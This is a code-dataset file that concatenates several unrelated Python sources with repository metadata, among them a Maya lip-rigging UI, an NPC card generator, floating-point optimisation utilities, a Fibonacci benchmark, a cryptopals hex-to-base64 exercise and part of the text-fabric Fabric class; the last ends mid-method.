        options_layout.setContentsMargins(6, 1, 6, 2)
        options_layout.addLayout(lipThickness_layout)
        # options_layout.addLayout(offset_layout)
        options_layout.addLayout(parent_layout)
        self.options_group.setLayout(options_layout)
        # Name prefix
        name_prefix_layout = QtWidgets.QHBoxLayout()
        name_prefix_layout.setContentsMargins(1, 1, 1, 1)
        name_prefix_layout.addWidget(self.name_prefix)
        self.prefix_group.setLayout(name_prefix_layout)
        # Control Name Extension
        controlExtension_layout = QtWidgets.QHBoxLayout()
        controlExtension_layout.setContentsMargins(1, 1, 1, 1)
        controlExtension_layout.addWidget(self.control_name)
        self.control_group.setLayout(controlExtension_layout)
        # Main Layout
        main_layout = QtWidgets.QVBoxLayout()
        main_layout.setContentsMargins(6, 6, 6, 6)
        main_layout.addWidget(self.prefix_group)
        main_layout.addWidget(self.control_group)
        main_layout.addWidget(self.geometryInput_group)
        main_layout.addWidget(self.options_group)
        main_layout.addWidget(self.joints_group)
        main_layout.addWidget(self.topoSkin_group)
        main_layout.addWidget(self.build_button)
        main_layout.addWidget(self.import_button)
        main_layout.addWidget(self.export_button)
        self.setLayout(main_layout)
    def create_connections(self):
        """Wire the '<<' pick buttons and the build/import/export actions."""
        self.edge_loop_button.clicked.connect(
            partial(self.populate_edge_loop, self.edge_loop)
        )
        self.up_vertex_button.clicked.connect(
            partial(self.populate_element, self.up_vertex, "vertex")
        )
        self.low_vertex_button.clicked.connect(
            partial(self.populate_element, self.low_vertex, "vertex")
        )
        self.parent_button.clicked.connect(
            partial(self.populate_element, self.parent_node)
        )
        self.head_joint_button.clicked.connect(
            partial(self.populate_element, self.head_joint, "joint")
        )
        self.jaw_joint_button.clicked.connect(
            partial(self.populate_element, self.jaw_joint, "joint")
        )
        self.build_button.clicked.connect(self.build_rig)
        self.import_button.clicked.connect(self.import_settings)
        self.export_button.clicked.connect(self.export_settings)
    # SLOTS ##########################################################
    # TODO: create a checker to ensure that the vertex selected are part of
    # the main edgelopp
    def populate_element(self, lEdit, oType="transform"):
        """Copy the name of the current selection into *lEdit*.

        Warns instead when nothing is selected or the selection is not
        of the requested *oType* ("transform", "vertex" or "joint").
        """
        if oType == "joint":
            oTypeInst = pm.nodetypes.Joint
        elif oType == "vertex":
            oTypeInst = pm.MeshVertex
        else:
            oTypeInst = pm.nodetypes.Transform
        oSel = pm.selected()
        if oSel:
            if isinstance(oSel[0], oTypeInst):
                lEdit.setText(oSel[0].name())
            else:
                pm.displayWarning(
                    "The selected element is not a valid %s" % oType)
        else:
            pm.displayWarning("Please select first one %s." % oType)
    def populate_edge_loop(self, lineEdit):
        """Fill *lineEdit* with the edge loop derived from the selection."""
        lineEdit.setText(lib.get_edge_loop_from_selection())
    def build_rig(self):
        """Build the rig from the current widget values."""
        rig(**lib.get_settings_from_widget(self))
    def export_settings(self):
        """Save the current widget values to a user-chosen json file."""
        data_string = json.dumps(
            lib.get_settings_from_widget(self), indent=4, sort_keys=True
        )
        file_path = lib.get_file_path(self.filter, "save")
        if not file_path:
            return
        with open(file_path, "w") as f:
            f.write(data_string)
    def import_settings(self):
        """Load widget values from a user-chosen json file."""
        file_path = lib.get_file_path(self.filter, "open")
        if not file_path:
            return
        lib.import_settings_from_file(file_path, self)
# Build from json file.
def rig_from_file(path):
    """Build the lips rig from a json configuration file.

    Args:
        path (str): Path to a json file holding the keyword arguments
            accepted by ``rig`` (same format as the UI export).
    """
    # Use a context manager so the file handle is closed even when json
    # parsing or the rig build raises (the old json.load(open(path))
    # leaked the handle).
    with open(path) as config_file:
        settings = json.load(config_file)
    rig(**settings)
def show(*args):
    """Open the Lips Rigger dialog (entry point for Maya menus/shelves)."""
    gqt.showDialog(ui)
# Open the UI when the module is executed directly.
if __name__ == "__main__":
    show()
| 37.934701
| 79
| 0.533394
|
4a0e9b9b2c7af5893ba59ed51d26348f82c9d88c
| 2,786
|
py
|
Python
|
main.py
|
Yar59/NPC_Generator
|
f49aa2d04e36c3a36377a9b62b0e9449b5aa9f23
|
[
"MIT"
] | null | null | null |
main.py
|
Yar59/NPC_Generator
|
f49aa2d04e36c3a36377a9b62b0e9449b5aa9f23
|
[
"MIT"
] | null | null | null |
main.py
|
Yar59/NPC_Generator
|
f49aa2d04e36c3a36377a9b62b0e9449b5aa9f23
|
[
"MIT"
] | null | null | null |
from faker import Faker
from file_operations import render_template
import random
# Number of NPC cards generated per run.
NUMBER_OF_CARDS = 10
# Russian-locale fake data source for names, jobs and cities.
fake = Faker("ru_RU")
# Pool of skill names (Russian); each NPC gets three of them at random.
SKILLS = ["Стремительный прыжок",
          "Электрический выстрел",
          "Ледяной удар",
          "Стремительный удар",
          "Кислотный взгляд",
          "Тайный побег",
          "Ледяной выстрел",
          "Огненный заряд"]
# Maps each Cyrillic letter to the same letter decorated with combining
# diacritics, giving skill names a "runic" look on the rendered card.
LETTERS_MAPPING = {
    'а': 'а͠', 'б': 'б̋', 'в': 'в͒͠',
    'г': 'г͒͠', 'д': 'д̋', 'е': 'е͠',
    'ё': 'ё͒͠', 'ж': 'ж͒', 'з': 'з̋̋͠',
    'и': 'и', 'й': 'й͒͠', 'к': 'к̋̋',
    'л': 'л̋͠', 'м': 'м͒͠', 'н': 'н͒',
    'о': 'о̋', 'п': 'п̋͠', 'р': 'р̋͠',
    'с': 'с͒', 'т': 'т͒', 'у': 'у͒͠',
    'ф': 'ф̋̋͠', 'х': 'х͒͠', 'ц': 'ц̋',
    'ч': 'ч̋͠', 'ш': 'ш͒͠', 'щ': 'щ̋',
    'ъ': 'ъ̋͠', 'ы': 'ы̋͠', 'ь': 'ь̋',
    'э': 'э͒͠͠', 'ю': 'ю̋͠', 'я': 'я̋',
    'А': 'А͠', 'Б': 'Б̋', 'В': 'В͒͠',
    'Г': 'Г͒͠', 'Д': 'Д̋', 'Е': 'Е',
    'Ё': 'Ё͒͠', 'Ж': 'Ж͒', 'З': 'З̋̋͠',
    'И': 'И', 'Й': 'Й͒͠', 'К': 'К̋̋',
    'Л': 'Л̋͠', 'М': 'М͒͠', 'Н': 'Н͒',
    'О': 'О̋', 'П': 'П̋͠', 'Р': 'Р̋͠',
    'С': 'С͒', 'Т': 'Т͒', 'У': 'У͒͠',
    'Ф': 'Ф̋̋͠', 'Х': 'Х͒͠', 'Ц': 'Ц̋',
    'Ч': 'Ч̋͠', 'Ш': 'Ш͒͠', 'Щ': 'Щ̋',
    'Ъ': 'Ъ̋͠', 'Ы': 'Ы̋͠', 'Ь': 'Ь̋',
    'Э': 'Э͒͠͠', 'Ю': 'Ю̋͠', 'Я': 'Я̋',
    ' ': ' '
}
def main(number_of_cards):
    """Render ``number_of_cards`` NPC cards as svg files.

    Each card gets a random name, job, town, five 3d6-style ability
    scores and three random skills; skill names are converted to a
    "runic" look via LETTERS_MAPPING and rendered through the
    charsheet svg template.

    Args:
        number_of_cards (int): How many cards to generate.
    """
    # Build the translation table once; str.translate performs all the
    # per-letter substitutions in a single pass instead of a chain of
    # str.replace calls per skill.
    rune_table = str.maketrans(LETTERS_MAPPING)
    for card_index in range(number_of_cards):
        random_first_name = fake.first_name()
        random_last_name = fake.last_name()
        random_job = fake.job()
        random_city = fake.city()
        random_skills = random.sample(SKILLS, 3)
        rune_skills = [skill.translate(rune_table) for skill in random_skills]
        context = {
            "first_name": random_first_name,
            "last_name": random_last_name,
            "town": random_city,
            "job": random_job,
            "strength": random.randint(3, 18),
            "agility": random.randint(3, 18),
            "endurance": random.randint(3, 18),
            "intelligence": random.randint(3, 18),
            "luck": random.randint(3, 18),
            "skill_1": rune_skills[0],
            "skill_2": rune_skills[1],
            "skill_3": rune_skills[2],
        }
        input_path = "src/charsheet.svg"
        # Plain format call: the old backslash-continued triple-quoted
        # string accidentally appended the continuation indentation
        # (trailing spaces) to every output file name.
        output_path = "output/svg/{}.{}{}.svg".format(
            card_index, random_first_name, random_last_name)
        render_template(input_path, output_path, context)
# Generate the default number of cards when run as a script.
if __name__ == '__main__':
    main(NUMBER_OF_CARDS)
| 33.97561
| 71
| 0.416009
|
4a0e9ca537e55a269872ae3c75cdac62b45c71ca
| 5,377
|
py
|
Python
|
soap/shell/utils.py
|
gitter-badger/soap
|
4f5eb7848e4dc516a6ff972db5c8c46ec9037c47
|
[
"MIT"
] | 22
|
2016-02-08T16:57:30.000Z
|
2021-03-12T20:32:06.000Z
|
soap/shell/utils.py
|
gitter-badger/soap
|
4f5eb7848e4dc516a6ff972db5c8c46ec9037c47
|
[
"MIT"
] | 1
|
2018-07-11T21:21:27.000Z
|
2018-07-17T19:53:19.000Z
|
soap/shell/utils.py
|
gitter-badger/soap
|
4f5eb7848e4dc516a6ff972db5c8c46ec9037c47
|
[
"MIT"
] | 6
|
2016-02-01T13:30:56.000Z
|
2018-11-28T04:35:27.000Z
|
import csv
import os
import random
import time
from soap import logger
from soap.analysis import frontier as analysis_frontier, Plot
from soap.context import context
from soap.expression import is_expression
from soap.parser import parse as _parse
from soap.program.generator import generate_function
from soap.semantics import (
arith_eval, BoxState, ErrorSemantics, flow_to_meta_state, IntegerInterval
)
from soap.transformer import (
closure, expand, frontier, greedy, parsings, reduce, thick,
partition_optimize
)
def parse(program):
    """Return ``(program, inputs, outputs)`` for *program*.

    *program* may be an already parsed object, a source string, or a
    path to a ``.soap`` file (which is read from disk first).
    """
    if isinstance(program, str):
        source = program
        if source.endswith('.soap'):
            with open(source) as handle:
                source = handle.read()
        program = _parse(source)
    return program, program.inputs, program.outputs
def _generate_samples(iv, population_size):
    """Draw ``population_size`` random input states from interval box *iv*.

    Seeds the RNG with a fixed value so simulations are reproducible.
    """
    random.seed(0)
    def sample(error):
        # Integer intervals: pick one point value inside [min, max].
        if isinstance(error, IntegerInterval):
            v = random.randrange(error.min, error.max + 1)
            return IntegerInterval([v, v])
        # Float intervals: sample value and error bound independently.
        v = random.uniform(error.v.min, error.v.max)
        e = random.uniform(error.e.min, error.e.max)
        return ErrorSemantics(v, e)
    samples = [
        BoxState({var: sample(error) for var, error in iv.items()})
        for i in range(population_size)]
    return samples
def _run_simulation(program, samples, outputs):
    """Evaluate *program* on every sampled input state.

    Returns the largest absolute error bound observed over the
    *outputs* variables.  Ctrl-C stops the loop early and returns the
    maximum found so far.
    """
    max_error = 0
    n = len(samples)
    try:
        for i, iv in enumerate(samples):
            logger.persistent(
                'Sim', '{}/{}'.format(i + 1, n), l=logger.levels.debug)
            result_state = arith_eval(program, iv)
            error = max(
                max(abs(error.e.min), abs(error.e.max))
                for var, error in result_state.items() if var in outputs)
            max_error = max(error, max_error)
        logger.unpersistent('Sim')
    except KeyboardInterrupt:
        # Deliberate: a long simulation may be interrupted; the partial
        # maximum is still returned.
        pass
    return max_error
def simulate_error(program, population_size):
    """Monte-Carlo estimate of the maximum output error of *program*."""
    program, inputs, outputs = parse(program)
    samples = _generate_samples(BoxState(inputs), population_size)
    return _run_simulation(flow_to_meta_state(program), samples, outputs)
# Dispatch table from context.algorithm names to transformer routines.
# The first four routines take only an expression set, so the extra
# (state, out_vars) arguments are discarded by the lambdas.
_algorithm_map = {
    'closure': lambda expr_set, _1, _2: closure(expr_set),
    'expand': lambda expr_set, _1, _2: expand(expr_set),
    'parsings': lambda expr_set, _1, _2: parsings(expr_set),
    'reduce': lambda expr_set, _1, _2: reduce(expr_set),
    'greedy': greedy,
    'frontier': frontier,
    'thick': thick,
    'partition': partition_optimize,
}
def optimize(source, file_name=None):
    """Optimise *source* with the algorithm named in ``context.algorithm``.

    Returns an 'emir' dict bundling the original analysis point, the
    optimisation results, elapsed time and provenance info.
    """
    program, inputs, outputs = parse(source)
    if not is_expression(program):
        program = flow_to_meta_state(program).filter(outputs)
    func = _algorithm_map[context.algorithm]
    state = BoxState(inputs)
    # Analysis point of the unoptimised program, kept for comparison.
    original = analysis_frontier([program], state, outputs).pop()
    start_time = time.time()
    results = func(program, state, outputs)
    elapsed_time = time.time() - start_time
    # results = analysis_frontier(expr_set, state, out_vars)
    emir = {
        'original': original,
        'inputs': inputs,
        'outputs': outputs,
        'results': results,
        'time': elapsed_time,
        'context': context,
        'source': source,
        'file': file_name,
    }
    return emir
def plot(emir, file_name, reanalyze=False):
    """Plot an emir's frontier against the original and save it as PDF."""
    figure = Plot()
    original = emir['original']
    algorithm = emir['context'].algorithm
    figure.add_original(original)
    legend = '{} ({:.2f}s)'.format(algorithm, emir['time'])
    figure.add(emir['results'], legend=legend)
    figure.save('{}.pdf'.format(emir['file']))
    figure.show()
def emir2csv(emir, file):
    """Write an emir as CSV: a header row, the original program's row,
    then one row (stats + generated code) per optimisation result."""
    # Function name for code generation: base file name without extension.
    name = os.path.split(emir['file'])[-1]
    name = name.split(os.path.extsep)[0]
    csvwriter = csv.writer(file, lineterminator='\n')
    orig = emir['original']
    csvwriter.writerow(orig._fields)
    # Replace the last field of the original row with the source text.
    csvwriter.writerow(orig[:-1] + (emir['source'], ))
    for i, result in enumerate(emir['results']):
        logger.persistent(
            'Generate', '{}/{}'.format(i + 1, len(emir['results'])))
        stats = result.stats()
        expr = result.expression
        code = generate_function(name, expr, emir['inputs'], emir['outputs'])
        csvwriter.writerow(stats + (code, ))
    logger.unpersistent('Generate')
def report(emir, file_name):
    """Summarise an emir as a nested dict (accuracy + resource figures).

    Each sub-report re-simulates its candidate on 100 random inputs.
    """
    def sub_report(result):
        samples = _generate_samples(emir['inputs'], 100)
        sim_error = _run_simulation(
            result.expression, samples, emir['outputs'])
        return {
            'Accuracy': {
                'Error Bound': float(result.error),
                'Simulation': float(sim_error),
            },
            'Resources': {
                'Estimated': {
                    'LUTs': result.lut,
                    'Registers': result.ff,
                    'DSP Elements': result.dsp,
                },
            },
        }
    original = emir['original']
    results = sorted(emir['results'])
    report = {
        'Name': file_name,
        'Time': emir['time'],
        'Total': len(emir['results']),
        'Statistics': {
            'Original': sub_report(original),
            'Fewest Resources': sub_report(results[0]),
            'Most Accurate': sub_report(results[-1]),
            # NOTE(review): Ellipsis placeholder — sub_report(...) will
            # raise at runtime; the best-latency candidate still needs
            # to be selected and passed here.
            'Best Latency': sub_report(...),
        },
        'Context': emir['context'],
    }
    return report
| 31.080925
| 77
| 0.612237
|
4a0e9e8734fac4f422655e522f6ca590f0cefb0c
| 151
|
py
|
Python
|
StickyDJ-Bot/src/clients/config.py
|
JCab09/StickyDJ-Bot
|
feaf2229a6729be6ad022f9105da19192e3a91d3
|
[
"WTFPL"
] | null | null | null |
StickyDJ-Bot/src/clients/config.py
|
JCab09/StickyDJ-Bot
|
feaf2229a6729be6ad022f9105da19192e3a91d3
|
[
"WTFPL"
] | null | null | null |
StickyDJ-Bot/src/clients/config.py
|
JCab09/StickyDJ-Bot
|
feaf2229a6729be6ad022f9105da19192e3a91d3
|
[
"WTFPL"
] | null | null | null |
#!/usr/bin/env python3
"""Base-Client configloader
So far Obsolete due to configmaker-module
in ../src/util/configmaker.py
Author: Jason Cabezuela
"""
| 21.571429
| 41
| 0.761589
|
4a0e9f22058f068a9bd0c1f19c9af26c9b689452
| 345
|
py
|
Python
|
cryptopals/set1/1.py
|
diofeher/ctf-writeups
|
b82eaae064fe5339c69892dd084e0f1915ca8bb5
|
[
"MIT"
] | 8
|
2018-12-30T06:49:29.000Z
|
2021-06-30T22:37:54.000Z
|
cryptopals/set1/1.py
|
diofeher/ctf-writeups
|
b82eaae064fe5339c69892dd084e0f1915ca8bb5
|
[
"MIT"
] | null | null | null |
cryptopals/set1/1.py
|
diofeher/ctf-writeups
|
b82eaae064fe5339c69892dd084e0f1915ca8bb5
|
[
"MIT"
] | 2
|
2020-03-10T11:04:54.000Z
|
2020-10-13T12:34:16.000Z
|
import base64
def hex_to_b64(text):
    """Convert a hex-encoded string to its base64 encoding.

    Args:
        text (str): Hex digits (even length).

    Returns:
        str: Base64 encoding of the decoded bytes, as text so the
        module-level comparison against a string literal holds.
    """
    # str.decode('hex') is Python 2 only; bytes.fromhex is the
    # Python 3 equivalent.
    raw = bytes.fromhex(text)
    return base64.b64encode(raw).decode('ascii')
# Cryptopals set 1, challenge 1: convert hex to base64.
st = '49276d206b696c6c696e6720796f757220627261696e206c696b65206120706f69736f6e6f7573206d757368726f6f6d'
# I'm killing your brain like a poisonous mushroom
assert hex_to_b64(st) == 'SSdtIGtpbGxpbmcgeW91ciBicmFpbiBsaWtlIGEgcG9pc29ub3VzIG11c2hyb29t'
| 34.5
| 103
| 0.831884
|
4a0e9f46414a8d463bcdffa28f734a17d3413cbe
| 207
|
py
|
Python
|
regtests/bench/recursive_fib.py
|
secureosv/pythia
|
459f9e2bc0bb2da57e9fa8326697d9ef3386883a
|
[
"BSD-3-Clause"
] | 17
|
2015-12-13T23:11:31.000Z
|
2020-07-19T00:40:18.000Z
|
regtests/bench/recursive_fib.py
|
secureosv/pythia
|
459f9e2bc0bb2da57e9fa8326697d9ef3386883a
|
[
"BSD-3-Clause"
] | 8
|
2016-02-22T19:42:56.000Z
|
2016-07-13T10:58:04.000Z
|
regtests/bench/recursive_fib.py
|
secureosv/pythia
|
459f9e2bc0bb2da57e9fa8326697d9ef3386883a
|
[
"BSD-3-Clause"
] | 3
|
2016-04-11T20:34:31.000Z
|
2021-03-12T10:33:02.000Z
|
'''
Fibonacci Sequence
'''
from time import clock
def F(n):
    """n-th Fibonacci number by naive double recursion (benchmark target)."""
    if n == 0:
        return 0
    if n == 1:
        return 1
    return F(n - 1) + F(n - 2)
def main():
    """Time one evaluation of F(32) and print the elapsed seconds."""
    # time.clock was deprecated in 3.3 and removed in Python 3.8;
    # perf_counter is the recommended replacement for benchmark timing.
    from time import perf_counter
    start = perf_counter()
    a = F(32)
    print(perf_counter() - start)
# Run the benchmark immediately (also on import, as in the original script).
main()
| 11.5
| 27
| 0.584541
|
4a0e9f94844fff257b98f6c35f270e0df0fc5e8b
| 19,188
|
py
|
Python
|
tf/fabric.py
|
gitter-badger/text-fabric
|
ac614e490d0779a6ad89dbf30b697cd6e736bd57
|
[
"MIT"
] | null | null | null |
tf/fabric.py
|
gitter-badger/text-fabric
|
ac614e490d0779a6ad89dbf30b697cd6e736bd57
|
[
"MIT"
] | null | null | null |
tf/fabric.py
|
gitter-badger/text-fabric
|
ac614e490d0779a6ad89dbf30b697cd6e736bd57
|
[
"MIT"
] | 1
|
2020-01-22T13:13:30.000Z
|
2020-01-22T13:13:30.000Z
|
import os
import collections
from .parameters import VERSION, NAME, APIREF, LOCATIONS
from .core.data import Data, WARP, WARP2_DEFAULT, MEM_MSG
from .core.helpers import (
itemize, setDir, expandDir, collectFormats, cleanName, check32, console, makeExamples
)
from .core.timestamp import Timestamp
from .core.prepare import (levels, order, rank, levUp, levDown, boundary, sections, structure)
from .core.api import (
Api,
NodeFeature,
EdgeFeature,
OtypeFeature,
OslotsFeature,
Computed,
addSortKey,
addOtype,
addLocality,
addRank,
addText,
addSearch,
)
from .convert.mql import MQL, tfFromMql
# Precomputation recipe: (needs_otext, feature_name, method, dependencies).
# The leading boolean marks steps that additionally depend on the otext
# (WARP[2]) feature; their dependency lists are extended at index time
# with the otext-declared section/structure features (see KIND below).
PRECOMPUTE = (
    (False, '__levels__', levels, WARP),
    (False, '__order__', order, WARP[0:2] + ('__levels__', )),
    (False, '__rank__', rank, (WARP[0], '__order__')),
    (False, '__levUp__', levUp, WARP[0:2] + ('__rank__', )),
    (False, '__levDown__', levDown, (WARP[0], '__levUp__', '__rank__')),
    (False, '__boundary__', boundary, WARP[0:2] + ('__rank__', )),
    (True, '__sections__', sections, WARP + ('__levUp__', '__levels__')),
    (True, '__structure__', structure, WARP + ('__rank__', '__levUp__',)),
)
# Maps the otext-dependent precomputed features to the otext key prefix
# ('<kind>Features') that lists their extra feature dependencies.
KIND = dict(
    __sections__='section',
    __structure__='structure',
)
class Fabric(object):
    def __init__(self, locations=None, modules=None, silent=False):
        """Set up a Fabric instance: banner, search paths, feature index.

        *locations* and *modules* may be newline-separated strings or
        lists; defaults come from ``LOCATIONS`` and a single '' module.
        """
        self.silent = silent
        self.tm = Timestamp()
        self.tm.setSilent(silent)
        self.banner = f'This is {NAME} {VERSION}'
        self.version = VERSION
        # Warn when running on a 32-bit Python (limited address space).
        (on32, warn, msg) = check32()
        if on32:
            self.tm.info(warn, tm=False)
        if msg:
            self.tm.info(msg, tm=False)
        self.tm.info(
            f'''{self.banner}
Api reference : {APIREF}
''', tm=False
        )
        self.good = True
        if modules is None:
            modules = ['']
        if type(modules) is str:
            modules = [x.strip() for x in itemize(modules, '\n')]
        self.modules = modules
        if locations is None:
            locations = LOCATIONS
        if type(locations) is str:
            locations = [x.strip() for x in itemize(locations, '\n')]
        setDir(self)
        # Expand ~, environment-style prefixes etc. in each location.
        self.locations = []
        for loc in locations:
            self.locations.append(expandDir(self, loc))
        self.locationRep = '\n\t'.join(
            '\n\t'.join(f'{l}/{f}' for f in self.modules) for l in self.locations
        )
        self.featuresRequested = []
        self._makeIndex()
    def load(self, features, add=False, silent=None):
        """Load *features* (string or iterable) plus warp and precomputed data.

        With ``add=True`` the features are added to the already loaded
        set and the existing api is updated in place; otherwise a fresh
        api object is built and returned (False on failure).
        """
        if silent is not None:
            wasSilent = self.tm.isSilent()
            self.tm.setSilent(silent)
        self.tm.indent(level=0, reset=True)
        self.tm.info('loading features ...')
        self.sectionsOK = True
        self.structureOK = True
        self.good = True
        if self.good:
            featuresRequested = itemize(features) if type(features) is str else sorted(features)
            if add:
                self.featuresRequested += featuresRequested
            else:
                self.featuresRequested = featuresRequested
            # Load the warp features; otext (WARP[2]) is optional — its
            # absence only disables the text parts of the API.
            for fName in list(WARP):
                self._loadFeature(fName, optional=fName == WARP[2])
        if self.good:
            self.textFeatures = set()
            if WARP[2] in self.features:
                otextMeta = self.features[WARP[2]].metaData
                # Merge metadata of language-specific otext modules (otext@xx).
                for otextMod in self.features:
                    if otextMod.startswith(WARP[2] + '@'):
                        self._loadFeature(otextMod)
                        otextMeta.update(self.features[otextMod].metaData)
                self.sectionFeats = itemize(otextMeta.get('sectionFeatures', ''), ',')
                self.sectionTypes = itemize(otextMeta.get('sectionTypes', ''), ',')
                self.structureFeats = itemize(otextMeta.get('structureFeatures', ''), ',')
                self.structureTypes = itemize(otextMeta.get('structureTypes', ''), ',')
                (self.cformats, self.formatFeats) = collectFormats(otextMeta)
                # Sections: between 1 and 3 types/features must be declared.
                if not (0 < len(self.sectionTypes) <= 3) or not (0 < len(self.sectionFeats) <= 3):
                    if not add:
                        self.tm.warning(
                            f'No section config in {WARP[2]}, the section part of the T-API cannot be used'
                        )
                    self.sectionsOK = False
                else:
                    self.textFeatures |= set(self.sectionFeats)
                    self.sectionFeatsWithLanguage = {
                        f
                        for f in self.features
                        if f == self.sectionFeats[0] or f.startswith(f'{self.sectionFeats[0]}@')
                    }
                    self.textFeatures |= set(self.sectionFeatsWithLanguage)
                if not self.structureTypes or not self.structureFeats:
                    if not add:
                        self.tm.warning(
                            f'No structure info in {WARP[2]}, the structure part of the T-API cannot be used'
                        )
                    self.structureOK = False
                else:
                    self.textFeatures |= set(self.structureFeats)
                self.textFeatures |= set(self.formatFeats)
                for fName in self.textFeatures:
                    self._loadFeature(fName)
            else:
                self.sectionsOK = False
                self.structureOK = False
        if self.good:
            self._precompute()
        if self.good:
            for fName in self.featuresRequested:
                self._loadFeature(fName)
        if not self.good:
            self.tm.indent(level=0)
            self.tm.error('Not all features could be loaded/computed')
            self.tm.cache()
            result = False
        elif add:
            try:
                self._updateApi()
            except MemoryError:
                console(MEM_MSG)
                result = False
        else:
            try:
                result = self._makeApi()
            except MemoryError:
                console(MEM_MSG)
                result = False
        if silent is not None:
            self.tm.setSilent(wasSilent)
        # In add-mode the caller keeps using the previously returned api.
        if not add:
            return result
    def explore(self, silent=None, show=True):
        """Classify all indexed features as node/edge/config/computed.

        Stores the classification in ``self.featureSets``; when *show*
        is True also returns it as a dict of sorted tuples.
        """
        if silent is not None:
            wasSilent = self.tm.isSilent()
            self.tm.setSilent(silent)
        nodes = set()
        edges = set()
        configs = set()
        computeds = set()
        for (fName, fObj) in self.features.items():
            # metaOnly: classification needs the header, not the data.
            fObj.load(metaOnly=True)
            dest = None
            if fObj.method:
                dest = computeds
            elif fObj.isConfig:
                dest = configs
            elif fObj.isEdge:
                dest = edges
            else:
                dest = nodes
            dest.add(fName)
        self.tm.info(
            'Feature overview: {} for nodes; {} for edges; {} configs; {} computed'.format(
                len(nodes),
                len(edges),
                len(configs),
                len(computeds),
            )
        )
        self.featureSets = dict(nodes=nodes, edges=edges, configs=configs, computeds=computeds)
        if silent is not None:
            self.tm.setSilent(wasSilent)
        if show:
            return dict((kind, tuple(sorted(kindSet)))
                        for (kind, kindSet) in sorted(self.featureSets.items(), key=lambda x: x[0]))
    def loadAll(self, silent=None):
        """Load every loadable (node and edge) feature; return the api."""
        api = self.load('', silent=silent)
        allFeatures = self.explore(silent=silent or True, show=True)
        loadableFeatures = allFeatures['nodes'] + allFeatures['edges']
        self.load(loadableFeatures, add=True, silent=silent)
        return api
def clearCache(self):
for (fName, fObj) in self.features.items():
fObj.cleanDataBin()
    def save(
        self,
        nodeFeatures={},
        edgeFeatures={},
        metaData={},
        location=None,
        module=None,
        silent=None,
    ):
        """Export node/edge/config feature data to .tf files.

        The oslots mapping (WARP[1]) is validated against otype
        (WARP[0]) before anything is written.  Returns True iff every
        feature was exported successfully.

        NOTE(review): the mutable default arguments are only read here,
        never mutated, so the shared-default pitfall does not apply.
        """
        good = True
        if silent is not None:
            wasSilent = self.tm.isSilent()
            self.tm.setSilent(silent)
        self.tm.indent(level=0, reset=True)
        self._getWriteLoc(location=location, module=module)
        # Metadata entries that are neither node/edge features nor the
        # shared '' defaults become config features.
        configFeatures = dict(
            f for f in metaData.items()
            if f[0] != '' and f[0] not in nodeFeatures and f[0] not in edgeFeatures
        )
        self.tm.info(
            'Exporting {} node and {} edge and {} config features to {}:'.format(
                len(nodeFeatures),
                len(edgeFeatures),
                len(configFeatures),
                self.writeDir,
            )
        )
        todo = []
        for (fName, data) in sorted(nodeFeatures.items()):
            todo.append((fName, data, False, False))
        for (fName, data) in sorted(edgeFeatures.items()):
            todo.append((fName, data, True, False))
        for (fName, data) in sorted(configFeatures.items()):
            todo.append((fName, data, None, True))
        total = collections.Counter()
        failed = collections.Counter()
        maxSlot = None
        maxNode = None
        slotType = None
        # Derive slotType/maxSlot/maxNode from the otype feature when given.
        if WARP[0] in nodeFeatures:
            self.tm.info(f'VALIDATING {WARP[1]} feature')
            otypeData = nodeFeatures[WARP[0]]
            if type(otypeData) is tuple:
                (otypeData, slotType, maxSlot, maxNode) = otypeData
            elif 1 in otypeData:
                slotType = otypeData[1]
                maxSlot = max(n for n in otypeData if otypeData[n] == slotType)
                maxNode = max(otypeData)
        if WARP[1] in edgeFeatures:
            self.tm.info(f'VALIDATING {WARP[1]} feature')
            oslotsData = edgeFeatures[WARP[1]]
            if type(oslotsData) is tuple:
                (oslotsData, maxSlot, maxNode) = oslotsData
            if maxSlot is None or maxNode is None:
                self.tm.error(f'ERROR: cannot check validity of {WARP[1]} feature')
                good = False
            else:
                self.tm.info(f'maxSlot={maxSlot:>11}')
                self.tm.info(f'maxNode={maxNode:>11}')
                maxNodeInData = max(oslotsData)
                minNodeInData = min(oslotsData)
                # oslots must map exactly the non-slot node range
                # maxSlot+1 .. maxNode — nothing below, nothing above.
                mappedSlotNodes = []
                unmappedNodes = []
                fakeNodes = []
                start = min((maxSlot + 1, minNodeInData))
                end = max((maxNode, maxNodeInData))
                for n in range(start, end + 1):
                    if n in oslotsData:
                        if n <= maxSlot:
                            mappedSlotNodes.append(n)
                        elif n > maxNode:
                            fakeNodes.append(n)
                    else:
                        if maxSlot < n <= maxNode:
                            unmappedNodes.append(n)
                if mappedSlotNodes:
                    self.tm.error(f'ERROR: {WARP[1]} maps slot nodes')
                    self.tm.error(makeExamples(mappedSlotNodes), tm=False)
                    good = False
                if fakeNodes:
                    self.tm.error(f'ERROR: {WARP[1]} maps nodes that are not in {WARP[0]}')
                    self.tm.error(makeExamples(fakeNodes), tm=False)
                    good = False
                if unmappedNodes:
                    self.tm.error(f'ERROR: {WARP[1]} fails to map nodes:')
                    # Group offenders by node type, largest group first.
                    unmappedByType = {}
                    for n in unmappedNodes:
                        unmappedByType.setdefault(otypeData.get(n, '_UNKNOWN_'), []).append(n)
                    for (nType, nodes) in sorted(
                        unmappedByType.items(),
                        key=lambda x: (-len(x[1]), x[0]),
                    ):
                        self.tm.error(f'--- unmapped {nType:<10} : {makeExamples(nodes)}')
                    good = False
            if good:
                self.tm.info(f'OK: {WARP[1]} is valid')
        for (fName, data, isEdge, isConfig) in todo:
            edgeValues = False
            # Per-feature metadata: shared '' defaults overridden by
            # feature-specific entries.
            fMeta = {}
            fMeta.update(metaData.get('', {}))
            fMeta.update(metaData.get(fName, {}))
            if fMeta.get('edgeValues', False):
                edgeValues = True
            if 'edgeValues' in fMeta:
                del fMeta['edgeValues']
            fObj = Data(
                f'{self.writeDir}/{fName}.tf',
                self.tm,
                data=data,
                metaData=fMeta,
                isEdge=isEdge,
                isConfig=isConfig,
                edgeValues=edgeValues,
            )
            tag = 'config' if isConfig else 'edge' if isEdge else 'node'
            if fObj.save(
                nodeRanges=fName == WARP[0],
                overwrite=True,
            ):
                total[tag] += 1
            else:
                failed[tag] += 1
        self.tm.indent(level=0)
        self.tm.info(
            'Exported {} node features and {} edge features and {} config features to {}'.format(
                total['node'],
                total['edge'],
                total['config'],
                self.writeDir,
            )
        )
        if len(failed):
            for (tag, nf) in sorted(failed.items()):
                self.tm.error(f'Failed to export {nf} {tag} features')
            good = False
        if silent is not None:
            self.tm.setSilent(wasSilent)
        return good
    def exportMQL(self, mqlName, mqlDir):
        """Write all features as an MQL database *mqlName* in *mqlDir*."""
        self.tm.indent(level=0, reset=True)
